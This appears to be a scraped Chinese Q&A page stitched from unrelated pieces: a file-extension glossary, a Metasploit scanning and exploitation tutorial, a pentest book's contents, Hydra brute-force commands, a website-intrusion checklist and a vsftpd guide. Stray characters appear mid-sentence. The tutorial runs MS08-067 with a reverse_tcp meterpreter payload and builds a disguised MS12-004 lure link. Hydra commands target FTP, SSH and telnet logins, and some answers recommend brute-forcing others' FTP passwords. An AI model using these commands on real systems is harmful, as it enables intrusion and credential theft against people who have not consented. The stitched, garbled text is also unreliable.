msf爆破ftp服務

① 伺服器所有文件都多了一個擴展名.GRANNY

文件後綴名大全
A:
1.ace:ace.exe或winace生成的壓縮文件
2.ain:ain是一種壓縮文件格式，解開ain需要用ain.exe。在網上可以找到。
可以在各大的ftppub/msdosutility之類地方尋找ain.exe
3.arj,a01,a02...:
arj是一種非常常見的壓縮文件格式，它可以支持帶目錄，多文件壓縮，
一般FTP中DOSutility目錄下都可以找到arj.exe，一般的版本有2.4
2,2.382.50等，其文件格式是通用的，不存在格式不認問題。
a01,a02,a03是arj在多文件壓縮時後面文件的預設文件名。
展開arj文件可以用arjx-va-yfilename.arj
在windows下可以試試用winzip展開。
4.asp:
.asp文件通常指的是ActiveServerPages文件，這個文本文件可以
包括下列部分的任意組合：文本/HTML標記/ASP腳本命令,可以用
ie瀏覽器直接打開，也可以用記事本打開編輯。
.asp文件也可能是一種文檔格式的文件，可以用cajviewer打開。
5.avi:
一般用windows自帶的媒體播放器就可以播放。
如果沒有圖象只有聲音，則可能是mpeg4格式，需要裝插件。
如果有單獨的字幕文件，則可以用其它播放器。
B:
1.BHX(BINHEX):
BinHex是蘋果機器的一種編碼方式.
WinZip可以解碼.將email以文本方式存檔,擴展名為.BHX,
就可以直接用WinZip解壓了.
2..bin
光碟映象文件，可以：
a.用Bin2ISO將bin轉成ISO文件，然後用WinImage解開.
注意：有些BIN文件實際上就是ISO文件如果上面的辦法有問題
可以直接將後綴改成iso,然後用WinImage解解看
b.用ISOBuster直接解BIN.
c.用daemon直接將BIN文件虛擬成光碟機
C:
1.caj:cajviewer,CAJ文件瀏覽器是中國學術期刊（光碟版）電子雜志社（CAJEJPH）
的產品。它是為中國期刊網（www.chinajournal.net.cn)的全文檢索，瀏覽開發的。
2.cdi:光碟映像文件，用DISKJuggle就可以打開
3.cdr:CorelDraw
4.cdp:NtiCdMaker做的光碟Image.用NtiCdMaker的FileCopy刻.
5.cfm:
www瀏覽器（伺服器支持，類似asp,php,jsp）or文本編輯器看源碼
6.chi:chm（htmlhelp)的索引，和chm文件一起使用
7.chm:
基於Html文件格式的幫助文檔，在IE4.0以上可以雙擊直接打開。
製作工具可以採用HtmlHelpWorkShop。
8.cif:是easycdcreator地image文件
9.cpj:
WinONCD的工程文件，不過如果那個Raw文件是2072位元組的扇區的話就是標準的ISO文件
換個擴展名，用什麼刻錄軟體都可以，最差用WinImage直接展開安裝也行。
10.cpx:cpx是一種壓縮過的矢量圖格式,CorelDraw
D:
1.dat：
一般指數據文件，比如某些音碟或者某些應用程序的數據。
是個很通用的擴展名（比如影碟，一般數據，......），無法判斷用那個程序打開，
除非有更多信息，比如這些文件是做什麼用的。
是某個軟體附帶的，還是獨立存在的，等等。
2.dbf:
DOS下:
foxbase
foxpro
DN中F3(view)
Windows:
qview(快速查看)
FoxPro
Office中Excel等.
3.ddi:DISKDUPE,unimg,unddi,undisk
4.dvi:Latex處理過的文件,用任何一種Latex軟體都可看它。
5.dxf:AutoCad,3DMax
6.dxr:
E:
1.ecw:有可能是ENSONIQAudioPCI音效卡的波表樣本
2.emf:擴展的wmf文件
3.eml:outlookexpress
4.eps:
eps是一種特殊的ps文件,通常是嵌入其他文檔中使用.製作這種文件非常簡單:
a)在Windows中安裝一台PostScript列印機(並不是真的要買一台,僅僅是安裝驅動
程序),例如HPLaserJet5P/5MPPostScript,設置其屬性中的PostScript輸出格式為
內嵌的PostScript,列印埠設為FILE(在磁碟上創建文件);
b)在任何繪圖軟體中編輯好圖形後,在列印對話框中將列印機設為那個PostScript
列印機,然後列印到文件,文件名可取為xxx.eps,這將是你所需要的eps文件.
很多常用軟體，比如ACDSee、Word等都可打開eps文件。
F:
1.fcd:用vitrulCD-ROM打開
2.fla:Flash
G:
1gerberfile(.dat.rep.pho文件):電路圖可以送去制板的
2.gif:gif是一種很普遍的圖像格式，用幾乎所有的圖像處理軟體都可以處理gif。
3.gtp:guitarpro
.gtp是2.2以下版本的，3.0版本的是.gp3
H:
1.hlp:編輯可用helpmagic,helpscribe
2.hqx:
hqx格式就是所謂的Binhex4.0文件。
實際是Ascii文件。
在PC上可以用winzip6.2以上解開。
在Mac機上，如果你用Fetch2.0以上來傳
(在隨機的AppleInternetConnectKit上已帶)
可以自動轉成原來的Binary文件。
一般來說，你down了hqx格式的文件在PC上是派不上
什麼用場的，當然你可以用來和別人交換word文件什麼的。
I:
1.icl:IconLibrary,用AxIcons打開，一個專用的畫圖標的軟體。
2.ic圖標文件，可以用acdsee轉成bmp文件。
3.idx:cterm非常下載下來的文件索引，用cterm自帶的indexread打開
4.iges:iges是一個基於NURBS的文件格式,可以用AutoCad打開，如果不行，可以可以先拿到rhino中轉成DXF
5.img:
img是軟盤image文件，一個img就是一個軟盤，尼需要一個工具將這樣
的文件展開還原到軟盤上，就是hd-，
6.is
一般是光碟鏡像，直接用來刻盤或者用winimage解開
也可以裝一個虛擬光碟軟體daemon直接將之虛擬成光碟。
J:
1、.jpg，.jpeg：
.jpg是一種高壓縮比的真彩圖像文件格式，一般的圖像處理軟體都可以
顯示jpg圖像。推薦使用的看jpg程序有：在DOS下sea,在windows下用
acdsee,在UNIX下可以用xv來看jpg。
K:
1、.kc：
可以用king打開。
L:
1.lwp:LotusWordPro格式
2.lrc:一個winamp插件的歌詞文件，可以在放mp3時顯示歌詞。以前叫lricsmate
3.lzh:
lzh是很老的一種壓縮文件格式，近幾年已經很少用了，展開lzh
文件需要lha.exe，在FTP的DOSutility目錄下應該有。
好象以前有一種自解壓然後運行的exe是用lha壓的，lzh用winrar就能解
4.ldb
Access資料庫鎖定文件，紀錄資料庫的鎖定信息，
比如是否被打開，是否以獨占形式訪問等等。
M:1.max:3DMax文件。
2.mdb:MicrosoftAccess資料庫文件
3.mdl:Rose文件
4.mif:一種是MaxPlusII的文件
5.mov:電影文件，用Quicktime打開。
6.mpp:ProjectFile(MsProject)
7.msf:
part1：文件頭，我見到的幾個都是mstor打頭的，文件頭包括版本信息、注冊表
的一些鍵值、圖片的位置信息等等，關系不是很大，不必仔細研究。
part2:圖片序列，圖片都是jpeg格式的，每張圖片的頭可以通過查找"JFIF"字元串查到，查到後一定要後退六個位元組，才是真正的jpeg文件頭。也就是說
jpeg文件的第七到第十個位元組是"JFIF"。每兩張圖片之間會有大量的位元組
填充0,中間你會找到屏保運行時產生的臨時文件的名字，如c:\\1.jpg;
由於jpg文件不校驗位元組和長度的，你可以隨便取到臨時文件名上面的哪個
0上。把之間的部分拷貝出來另存為.jpg文件就可以了，
part3：圖片都取出來了，還管它干什麼，呵呵
7.msi:
MSWindows的新的安裝文件標准。已經在Office2000和Windows2000中採用。
98或NT下，可以裝下面的軟體：InstMsi9x.exe,InstMsiNT.exe
N:
1.nb:Mathematica的一種文件格式把。
2.nf
察看方法：
1.文本編輯器都可以看。建議將自動換行設為80列。
專門的查看軟體：
NFOShow1.1是網友寫的，實際效果是我見過最好的，不過有時時會出錯退出。DAMN.NFO.Viewer.v2.0隻有幾十k，很好用，足夠了。還可以在dos窗口下typexx.nfo
3.ngp,.ngc:
是模擬器游戲的文件neopocott0.35b(ngp模擬器)ngp模擬器neopocott升級到
了v0.35b版本，可在win9x,2k,me平台上運行。新版本暫停功能得到修改，支持
了ngc的擴展名文件，可以更好的存儲和讀取文件，增加了對鍵盤的設置等等
4.njx:南極星的字處理軟體的文檔格式
5.nrg:Nero做的CDImage,用nero直接打開刻盤即可
1.opx：Microsoft組織結構圖，用office自帶的組件可以打開，
默認不安裝，需要添加程序。
P:
1.pdf:
pdf是adobe公司開發的一種類似於poscript的文件格式。可以用
adobe的acrobat,arcrbatreader來編輯，打開pdf文件
2.pdg:超星閱讀器SSreader3.52以上版本
3.phtml:cajviewer
4.pl:一般說來是PERLScript,也可能是mp3播放軟體的playlist文件
5.ppt.pps:PowerPoint
6、prn：
prn文件是列印機文件，比如你在Word中選擇"列印到文件"就會生成這種文件。
你可以把擴展名改為ps，然後用GSView打開。
或者用PrFile這個軟體直接把prn文件送到PS列印機列印出來。
7.ps:
ps的意思是PostScript，這是一種頁面描述語言，主要用於高質量列印。
在UNIX和windows下都可以用GhostView來看ps文件。其homepage是
http://www.cs.wisc.e/~ghost/gsview/new23.html
如果你有PoscriptScript支持的列印機，可以直接列印PS文件。
如果你想製做PS文件，簡單的辦法是：在Windows下安裝一個支持PostScript
的列印機驅動程序，比如HP4PS，你不需用非有這個列印機安裝在你的機器上。安裝好
驅動之後，在WIndows下任何一個編輯器中編輯好你需要轉成PS的文件，比如從
Word下。然後選擇"列印"，選擇那個PS兼容的驅動程序，然後選擇"printtofile"，
它將把列印輸出送到一個文件中去。因為你用了一個Poscript的列印驅動程序，
那麼這個列印文件就是PostScript文件了。將該文件改名字為XXX.ps就可以了。
8.ps.gz:
gzippedpostsript文件，可以用gsview直接打開，其支持gzip
如果是用IE下載的，有可能實際已經解開，可以去掉gz後綴試試。
9.psz:改成*.ps.gz試試,然後用gzip或者winzip解開就是.ps文件了
10.psf:outlinePostScriptprinterfont(ChiWriter)
11.ptl:AUTOCAD做出來的列印文件
Q:
R:
1、.rar，.r01，r02......:
rar是一種壓縮文件格式，在DOS下解開RAR可以用rar.exe，在各大FTP
裡面都可以找到，一般在pub/msdosutility之類地方。需要注意的是rar
高版本壓縮的文件低版本不認。當前最新的rarforDOS是2.X版，如果
能找到2.x版的話最好不要用1.X板的rar，2版的rar文件相互是通用的。
rar的命令行參數幾乎和arj一樣，rarx-v-yfilename.rar
可以展開文件，包括帶目錄和多文件壓縮。
rar多文件壓縮時rar之後的文件名是r00,r01,r02....
DOS下的軟體不支持長文件名，所以如果你的rar裡面有長文件名並且因為
在DOS下展開丟失了得話，可以試試winrarforwin95，支持長文件名。
在各大ftp上應該也可以找到。其所有版本都可以認rar2.X得文件。
2、.raw：
是easycd或者winoncd等軟體做的CDROM的ISO鏡像
RAW屬於MODE1的
3、.raw：
可用Photoshop看。
4、.rom：
是很小的音樂壓縮格式，使用realplayer可以播放。
5、.rom：
是模擬器的文件吧。
6、.rpm：
RPM是RedhatPackageManager的簡寫。
是linux底下的軟體包管理系統。
到Linux底下用使用rpm來對它進行操作。
7、.rm：
RM文件是一個包含了RA文件URL地址的文件，作用就同M3L與MP3一樣，用於
REALPLAYER在INTERNET上播放RA流。
8、.rmx：
可以用realplayer打開。
9、.rtf：
richtextformat
包含格式的文本，可用於各種編輯器間交換文件，但是體積要比專用格式大很多。可以用word，寫字板打開，一般的支持格式的編輯器都能打開。
S:
1、.sfe：filesplit分割文件。
用filesplit可以把他們合並成原來的zip文件。
或許還有自動合並得bat文件呢。
2、.sfv：
不是文件分割器產生的,是sfv32w產生的,一般用來做windows下的文件校驗。
3、.shar：
ShellArchive,文本格式的打包文件，類似tar,不過tar生成的為binaryfile，在UNIX下sh<*.shar即可解包,或用專門的shar/unsharutilities。
4、.shg：
是microsoft的helpworkshop的圖形處理工具生成的圖形文件，
是用來在help中調用的。
5、.sit：
MacintoshStuffitarchives,
aswellasUUE(uuencoded),HQX(BinHex),bin(MacBinary),ZIP,ARC,
ARJ,andGZarchives
use"AladdinExpander"toexpand
6、.srm：
呵呵,當然是用Kiven電子書庫了.你可以去化雲坊down3.0.12的版本,也可以去http://kiven.yeah.netkiven的主頁上當最新版.還有源碼的呦.
7、.stx：
SyntaxfileofEditPlus
8、：
是Flash的動畫格式，如果瀏覽器裝了插件，可以用瀏覽器打開，但最好用
FlashPlayerBrowser打開。
9、.swp：
ScientificWordPlace
10、.spw
SigmaPlotWorksheet
http://www.spssscience.com/sigmaplot
T:
1、.tar.GZor.tar：
.tar.gz，或者.tgz的文件一般是在UNIX下用tar和gunzip壓縮的文件。
可能的文件名還有.tar.GZ等。gunzip是一種比pkzip壓縮比高的壓縮程序，一般UNIX下都有。tar是一個多文件目錄打包器，一般也是在unix下。
在UNIX下展開.tar.gz文件用tarzxvffilename.tar.gz就可以了或者用gunzip-dfilename.tar.gz得到filename.tar然後用tarxvffilename.tar解包，兩步完成。
在PC環境下解tgz，可以用winzip6.2以上版本，可以直接打開extract。
建議在win95或者NT下使用winzip，因為很多這樣的文件都是在UNIX下壓縮的，
很可能有長文件名，但是WIndows3.1是不支持長文件名的，however,win31下的winzip也是應當可以展開tgz的。
2、.tar.Z：
.Z的文件一般是在UNIX下用compress命令壓縮的。在UNIX下解開可以用uncompressfilename.Z。在PC下可以用winzip6.2以上版本，建議使用
win95版本的winzip，因為win31不支持長文件名，而UNIX下的文件很
可能是長文件名。但win31下winzip應該也可以解開。
如果是.tar.Z的文件的話可以用uncompress先解開外面一層，然後用
tarxvffilename.tar解開tar文件。在PC下還是用winzip。
3、.tex：
.tex本身是個文本文件，必須經過編譯成dvi文件，使用winLatex就可以，如果你有unix當然會帶TeX或LaTex的。
U:
1、.ufo：
問：這種文件要用什麼程序打開？quickviewplus可以嗎？
答1：使用photoimpact應該可以.
答2：通常是漫畫,可以用冷雨瀏覽來看.
答3：找ufo2jpg.exe可以將ufo文件變成熟悉的JPG
2、.uu，.uue：
.uu是uucode的文件。uucode是一種把8bit文件轉成7bit的演算法。
我們知道，exe文件或者其他二進制文件是不可以直接用email
發出去的。uucode可以把這些文件轉成7bit格式，就是普通文本文件格式
(如下面的樣子)，然後就可以被接收方還原。
begin640pass
M("$Y-2V]R<5!1=UI!.C`Z,#I3=7!E`@<F]O=#IB>$Y-2V]R<5!1=UI!.C`Z,#I3=7!E<BU5<V5R.B\\Z+V)I;B]C
M<V@@<WES861M.BHZ,#HP.E-Y<W1E;2!6"B`@(&=U97-T.F-U-&I)=&M%9&HN
M:S(Z.3DX.CDY.#I\'=65S="!!8V-O=6YT.B]U<W(O<&5O<&QE+V=U97-T.B]B
如果你收到一個email是uucode做的，可以把它存成一個文件，將begin640..
之前的部分刪除，然後改文件名為.uu，然後用uudecode解開。
在windows下可以用winzip6.2以上版本。
V:
1、.vcd：
一般是virtualdriver的虛擬光碟機文件
也可以轉換成iso，用daemon打開，參見格式轉換，.vcd->.iso
另外金山影霸的文件也可能是vcd。
2、.vcf：
是地址本文件,用outlookexpress可以打開,(雙擊就可以)。
3、.vob：
DVD數據文件
4、.vos:
VOS是一款強大的電子琴模擬軟體,.vos文件可以用它打開。
5、.vqf：
用Winamp播放，需要裝相應的插件。
備註：VQF是YAMAHA公司和日本NTT公司聯合開發的一種新音樂格式，它的壓縮比比MP3更高，音質卻與MP3不相上下，而它之所以沒有MP3那般出盡風頭，大概與其推出時間較遲以及缺和相應的廣告宣傳有關吧，加之其播放、製作工具目前還不是很豐富，所以知道的人不是很多。但不管怎麼說，VQF的確是一種優秀的音樂壓縮格式。常見播放工具有YamahaVQPlayer等等。
6、.vsd：
visio畫的流程圖
7、.vss：
visiotemplatefile
W:1、.wdl：
Dynadoc，華康文件閱讀器可用dynadoc或FPread32.exe為關鍵字在ftp搜索引擎搜索。
2、.wmf：
WINDOWS的圖元文件，用ACDSEE可以看，WORD也可以打開。
3、.wpd：
WPD是corel公司的wordperfect字處理軟體的文檔的擴展名。
4、.wsz：
winamp的skin，down下來以後是wsz格式ws打開一個winzip先，然後用winzip里的open。。。。。。。
X:
1、.xls：
MicroSoftExcel的文件。
2、.xml：
eXtensibleMarkupLanguage
SGML的一個子集,1998年2月正式發布1.0版
目前IE5.0可支持，可以在IE5.0下瀏覽.xml文件，但同時必須有相應的.xsl文件
才能正常顯示。
Y:
......
Z:
1、.zip：
zip是一種最常見的壓縮格式，在UNIX下解開zip用unzip命令。
在PC下解開zip可以用pkunzip.exe,一般在大ftp裡面都可以找到，
或者用winzip解開。pkunzip-dfilename.zip可以帶目錄結構解開文件。

② 如何用Metasploit掃描埠

一、調用Nmap進行掃描
進入msf命令行後直接輸入nmap –v –sVip(具體命令和nmap一樣)
二、MSF模塊掃描
Use auxiliary/scanner/postscan/syn
先用搜索命令搜索有關埠掃描的工具：searchportscan
我們使用Use auxiliary/scanner/postscan/syn
看一下參數配置 showoptions

我們先來設置一下網卡
Set INTERFACE eth0
設置一下掃描的埠，我們這里來掃描80：set PORTS 80
設置掃描目標RHOSTS ：set RHOSTS 119.63.37.149
在設置一下蔽猜線程：set THREADS 100
看一下我們設置好的

這時候我們都設置好了，我們來攻擊下，看看效果，用命令run進行攻擊
缺點就是掃描的速度有點慢啊

MetaSploit SMB掃描獲取系統信息
還是搜索一下smb：searchsmb

這次發現搜出來很多，我們用這個模塊
Use auxiliary/scanner/smb/smb_version
看一下需要設置的參數

設定目標ip：set RHOSTS 192.168.188.140
在設置一下線程：set THREAD 10
然後run一下，查看結果

直接掃描出來小夥伴的系統還有主機名，速度不到1s，很快
也可以批量掃描設置批量掃描目標即可 set RHOSTS 192.168.188.50-200

MetaSploit服務識別
我們這里對SSH和FTP進行識別
在這里使用這個模塊：鬧毀use auxiliary/scanner/ssh/ssh_version
然後我們設置一下參數，這里講設置好的參數截圖看一下

Run一下看看結果，其實沒有掃出來，好像是屏蔽了，但是用nmap卻掃出來了ssh

在試一下ftp，用這個模塊：use auxiliary/scanner/ftp/ftp_version
設置下參數

可以看到結果，也沒有掃描出來；
MetaSploit SNMP掃描與枚舉
搜索一下snmpuse auxiliary/scanner/snmp/snmp_login
看一下他的參數設置

這個參數還是很多的
設定一下目標
然後在run一下
枚舉用這個模塊
use auxiliary/scanner/snmp/snmp_enum

設置好目標和線程後run一下就可以

MetaSploit遠程代碼執行
搜索一下08-067，使用這個攻擊載荷
use exploit/windows/smb/ms08_067_netapi
同樣來看一下參數設置

我們只要設置一下目標就可以，然後我們需要一個載荷來反彈shell
set payload windows/meterpreter/reverse_tcp
然後設置參數

將LHOST 設置為自己的ip（對外攻擊不要忘了段口轉發）
比如說知道對面的系統是什麼版本，可以指定targer，用target查看一下都有什麼版本

設置一下目標，假設我們目標機器的系統為10：set target 10
這時候，我們再來看一下其參數設置，發現比以前完備了好多

08-067是不會自宏彎型動識別系統版本的，但是其他的可以自動識別，所以用其他攻擊載荷的時候可以不用設置
然後輸入exploit進行攻擊即可
這時候會出來一個meterpreter>
我們在裡面輸入shell，就會反彈一個shell
這樣整個攻擊過程就完成了

MetaSploit MIDI文件解析遠程代碼執行
還是來搜索12-004

設置下本機ip set SRVHOST ip
然後攻擊

會生成一個連接，但是這個鏈接容易讓人發現，所以我們可以偽裝下ip利用URIPATH參數就可以偽裝
在設置時，會發現報紅，因為4444埠被佔用了，所以我們改下監聽埠 set LPORT 5555
然後生成連接

只要目標點了這個鏈接，那麼我們就會上線一個shell
說一下，目標點擊後我們這邊並沒有反映，我們需要輸下session查看當前會話，會找到上線的機子，連接上線的機子
Session –I 1（id）
然後輸入shell就可以拿到shell

③ metasploit怎樣利用ftp入侵

第一部分掃描

④ 打開我的FTP的時候說 {用戶指定的用戶名密碼無法登錄到該FTP伺服器}

這還能陵悶滑尺臘怎麼辦？
1.聯系該FTP伺服器管理員
和他要和GUEST帳號
2.爆罩伍破

⑤ Metasploit滲透測試指南的目錄

《metasploit滲透測試指南》
第1章 滲透測試技術基礎 1
1.1 ptes標准中的滲透測試階段 2
1.1.1 前期交互階段 2
1.1.2 情報搜集階段 2
1.1.3 威脅建模階段 2
1.1.4 漏洞分析階段 3
1.1.5 滲透攻擊階段 3
1.1.6 後滲透攻擊階段 3
1.1.7 報告階段 4
1.2 滲透測試類型 4
1.2.1 白盒測試 5
1.2.2 黑盒測試 5
1.3 漏洞掃描器 5
1.4 小結 6
第2章 metasploit基礎 7
2.1 專業術語 7
2.1.1 滲拿閉透攻擊（exploit） 8
2.1.2 攻擊載荷（payload） 8
2.1.3 shellcode 8
.2.1.4 模塊（mole） 8
2.1.5 監聽器（listener） 8
2.2 metasploit用戶介面 8
2.2.1 msf終端 9
2.2.2 msf命令行 9
2.2.3 armitage 11
2.3 metasploit功能程序 12
2.3.1 msf攻擊載荷生成器 12
2.3.2 msf編碼器 13
2.3.3 nasm shell 13
2.4 metasploit express和metasploit pro 14
2.5 小結 14
第3章 情報搜集 15
3.1 被動信息搜集 16
3.1.1 whois查詢 16
3.1.2 netcraft 17
3.1.3 nslookup 18
3.2 主動信息搜集 18
3.2.1 使用nmap進行埠掃描 18
3.2.2 在metasploit中使用資料庫 20
3.2.3 使用metasploit進行埠掃描 25
3.3 針對性掃描 26
3.3.1 伺服器消息塊協議掃描 26
3.3.2 搜尋配置不當的microsoft sql server 27
3.3.3 ssh伺服器掃描 28
3.3.4 ftp掃描 29
3.3.5 簡單網管協議掃罩升描 30
3.4 編寫自己的掃描器 31
3.5 小結 33
第4章 漏洞掃描 35
4.1 基本的漏洞掃描 36
4.2 使用nexpose進行掃描 37
4.2.1 配置 37
4.2.2 將掃描報告導入到metasploit中 42
4.2.3 在msf控制台中運行nexpose 43
4.3 使用nessus進行掃描 44
4.3.1 配置nessus 44
4.3.2 創建nessus掃描策略 45
4.3.3 執行nessus掃描 47
4.3.4 nessus報告 47
4.3.5 將掃描結果導入metasploit框架中 48
4.3.6 在metasploit內部使用nessus進行掃描 49
4.4 專用漏洞掃描器 51
4.4.1 驗證smb登錄 51
4.4.2 掃描開放的vnc空口令 52
4.4.3 掃描開放的x11伺服器 54
4.5 利用掃描結果進行自動化攻擊 56
第5章 滲透攻擊之旅 57
5.1 滲透攻擊消悶裂基礎 58
5.1.1 msf] show exploits 58
5.1.2 msf] show auxiliary 58
5.1.3 msf] show options 58
5.1.4 msf] show payloads 60
5.1.5 msf] show targets 62
5.1.6 info 63
5.1.7 set和unset 63
5.1.8 setg和unsetg 64
5.1.9 save 64
5.2 你的第一次滲透攻擊 64
5.3 攻擊一台ubuntu主機 68
5.4 全埠攻擊載荷：暴力猜解目標開放的埠 71
5.5 資源文件 72
5.6 小結 73
第6章 meterpreter 75
6.1 攻陷windows xp 虛擬機 76
6.1.1 使用nmap掃描埠 76
6.1.2 攻擊ms sql 76
6.1.3 暴力破解ms sql伺服器 78
6.1.4 xp_cmdshell 79
6.1.5 meterpreter基本命令 80
6.1.6 獲取鍵盤記錄 81
6.2 挖掘用戶名和密碼 82
6.2.1 提取密碼哈希值 82
6.2.2 使用meterpreter命令獲取密碼哈希值 83
6.3 傳遞哈希值 84
6.4 許可權提升 85
6.5 令牌假冒 87
6.6 使用ps 87
6.7 通過跳板攻擊其他機器 89
6.8 使用meterpreter腳本 92
6.8.1 遷移進程 92
6.8.2 關閉殺毒軟體 93
6.8.3 獲取系統密碼哈希值 93
6.8.4 查看目標機上的所有流量 93
6.8.5 攫取系統信息 93
6.8.6 控制持久化 94
6.9 向後滲透攻擊模塊轉變 95
6.10 將命令行shell升級為meterpreter 95
6.11 通過附加的railgun組件操作windows api 97
6.12 小結 97
第7章 免殺技術 99
7.1 使用msf攻擊載荷生成器創建可獨立運行的二進制文件 100
7.2 躲避殺毒軟體的檢測 101
7.2.1 使用msf編碼器 102
7.2.2 多重編碼 103
7.3 自定義可執行文件模板 105
7.4 隱秘地啟動一個攻擊載荷 106
7.5 加殼軟體 107
7.6 小結：關於免殺處理的最後忠告 108
第8章 客戶端滲透攻擊 109
8.1 基於瀏覽器的滲透攻擊 110
8.1.1 基於瀏覽器的滲透攻擊原理 111
8.1.2 空指令 112
8.2 使用immunity調試器來揭秘空指令機器碼 112
8.3 對ie瀏覽器的極光漏洞進行滲透利用 116
8.4 文件格式漏洞滲透攻擊 119
8.5 發送攻擊負載 120
8.6 小結 121
第9章 metasploit輔助模塊 123
9.1 使用輔助模塊 126
9.2 輔助模塊剖析 128
9.3 小結 133
第10章 社會工程學工具包 135
10.1 配置set工具包 136
10.2 針對性釣魚攻擊向量 137
10.3 web攻擊向量 142
10.3.1 java applet 142
10.3.2 客戶端web攻擊 146
10.3.3 用戶名和密碼獲取 148
10.3.4 標簽頁劫持攻擊 150
10.3.5 中間人攻擊 150
10.3.6 網頁劫持 151
10.3.7 綜合多重攻擊方法 153
10.4 傳染性媒體生成器 157
10.5 teensy usb hid攻擊向量 157
10.6 set的其他特性 160
10.7 小結 161
第11章 fast-track 163
11.1 microsoft sql注入 164
11.1.1 sql注入——查詢語句攻擊 165
11.1.2 sql注入——post參數攻擊 166
11.1.3 手工注入 167
11.1.4 ms sql破解 168
11.1.5 通過sql自動獲得控制（sqlpwnage） 172
11.2 二進制到十六進制轉換器 174
11.3 大規模客戶端攻擊 175
11.4 小結：對自動化滲透的一點看法 176
第12章 karmetasploit無線攻擊套件 177
12.1 配置 178
12.2 開始攻擊 179
12.3 獲取憑證 181
12.4 得到shell 182
12.5 小結 184
第13章 編寫你自己的模塊 185
13.1 在ms sql上進行命令執行 186
13.2 探索一個已存在的metasploit模塊 187
13.3 編寫一個新的模塊 189
13.3.1 powershell 189
13.3.2 運行shell滲透攻擊 190
13.3.3 編寫powershell_upload_exec函數 192
13.3.4 從十六進制轉換回二進製程序 192
13.3.5 計數器 194
13.3.6 運行滲透攻擊模塊 195
13.4 小結：代碼重用的能量 196
第14章 創建你自己的滲透攻擊模塊 197
14.1 fuzz測試的藝術 198
14.2 控制結構化異常處理鏈 201
14.3 繞過seh限制 204
14.4 獲取返回地址 206
14.5 壞字元和遠程代碼執行 210
14.6 小結 213
第15章 將滲透代碼移植到metasploit框架 215
15.1 匯編語言基礎 216
15.1.1 eip和esp寄存器 216
15.1.2 jmp指令集 216
15.1.3 空指令和空指令滑行區 216
15.2 移植一個緩沖區溢出攻擊代碼 216
15.2.1 裁剪一個已有的滲透攻擊代碼 218
15.2.2 構造滲透攻擊過程 219
15.2.3 測試我們的基礎滲透代碼 220
15.2.4 實現框架中的特性 221
15.2.5 增加隨機化 222
15.2.6 消除空指令滑行區 223
15.2.7 去除偽造的shellcode 223
15.2.8 我們完整的模塊代碼 224
15.3 seh覆蓋滲透代碼 226
15.4 小結 233
第16章 meterpreter腳本編程 235
16.1 meterpreter腳本編程基礎 235
16.2 meterpreter api 241
16.2.1 列印輸出 241
16.2.2 基本api調用 242
16.2.3 meterpreter mixins 242
16.3 編寫meterpreter腳本的規則 244
16.4 創建自己的meterpreter腳本 244
16.5 小結 250
第17章 一次模擬的滲透測試過程 251
17.1 前期交互 252
17.2 情報搜集 252
17.3 威脅建模 253
17.4 滲透攻擊 255
17.5 msf終端中的滲透攻擊過程 255
17.6 後滲透攻擊 257
17.6.1 掃描metasploitable靶機 258
17.6.2 識別存有漏洞的服務 259
17.7 攻擊apache tomcat 260
17.8 攻擊一個偏門的服務 262
17.9 隱藏你的蹤跡 264
17.10 小結 266
附錄a 配置目標機器 267
附錄b 命令參考列表 275

⑥ 如何防範hydra ftp 暴力破解

使用hydra -h 查看基本用法。
使用命令 hydra - L userlist -P passwdlist -s port ftp://ip address
成功爆破出密碼。
爆破telnet服務的命令為
hydra -L userlist -P passwdlist -s port telnet：//ipaddress
爆破ssh服務的命令為

hydra -L userlist -P passwdlist -s port ssh：//ipaddress

⑦ 從哪裡弄FTP密碼

找FTP伺服器管理員，或者用字典「爆破」。

⑧ 網站滲透測試怎麼做

1. 先看網站類型，安全性相對而已asp<aspx<php<jsp<cfm

2. 看伺服器類型 windows還是 linux 還有 伺服器應用，windows分iis6 iis7等等 linux分apache和nginx 需要知道對於版本的漏洞 如 iis6解析漏洞 你網路，web伺服器解析漏洞大全

3. 反正需要懂的知識蠻多的 ，你自學沒必要了，知識點 你可以網路下 知識點：

   網站入侵學習入門到高手所有重點難點視頻推薦

當知識點學的差不多了，總體的方法差不多就是：

入侵網站，鎖定目標 識別程序 找oday oday不成功 掃後門 掃備份 無後門 無備份 找後台 找注入 無注入 弱口令 無弱口令 找圖片 掃編輯器 無編輯器 掃目錄本地文件包含～任意文件下載 xss亂打拿不下 就旁註 旁不下 掃埠 還不行就去社 社不了 就爆破還不行 去C段 ip埠入侵 C段搞不了 子域名下手 還不行字典問題，

後面就是 學精sql注入（知道原理去嘗試繞過waf），xss ，還有代碼審計 內網域滲透，msf，反正學無止盡 這個知識主要靠累計，其他的靠自己本事去繞waf（ids和cdn），挖xss，oday獲取突破點。

⑨ centos 7 vsftpd重啟報錯 vsftpd.service: control process exited, code=exited status=1

FTP 是File Transfer Protocol（文件傳輸協議）的英文簡稱，而中文簡稱為「文傳協議」。

工作方式

主動模式：客戶端從一個任意的非特權埠N（N>1024）連接到FTP伺服器的命令埠，也就是21埠。然後客戶端開始 監聽埠N+1，並發送FTP命令「port N+1」到FTP伺服器。接著伺服器會從它自己的數據埠（20）連接到客戶端指定的數據埠（N+1）。
被動模式：當開啟一個 FTP連接時，客戶端打開兩個任意的非特權本地埠（N > 1024和N+1）。第一個埠連接伺服器的21埠，但與主動方式的FTP不同，客戶端不會提交PORT命令並允許伺服器來回連它的數據埠，而是提交 PASV命令。這樣做的結果是伺服器會開啟一個任意的非特權埠（P > 1024），並發送PORT P命令給客戶端。然後客戶端發起從本地埠N+1到伺服器的埠P的連接用來傳送數據。

先安裝vsftpd

[root@localhost ~]# yum install vsftpd -y[root@localhost ~]# systemctl start vsftpd #啟動vsftpd[root@localhost ~]# systemctl status vsftpd #查看vsftpd狀態
vsftpd.service - Vsftpd ftp daemon
Loaded: loaded (/usr/lib/systemd/system/vsftpd.service; disabled; vendor preset: disabled)
Active: active (running) since 五 2018-02-02 08:22:39 CST; 1min 50s ago
Process: 12558 ExecStart=/usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf (code=exited, status=0/SUCCESS)
Main PID: 12559 (vsftpd)
CGroup: /system.slice/vsftpd.service
└─12559 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf

vsftp三種認證模式

annoymous 匿名用戶 #無虛輸入密碼即可訪問
local user 真實用戶 #伺服器上存在的用戶
guest user 虛擬用戶 #映射到ftp伺服器的用戶

vsftpd的默認配置文件

[root@localhost ~]# vim /etc/vsftpd/vsftpd.conf
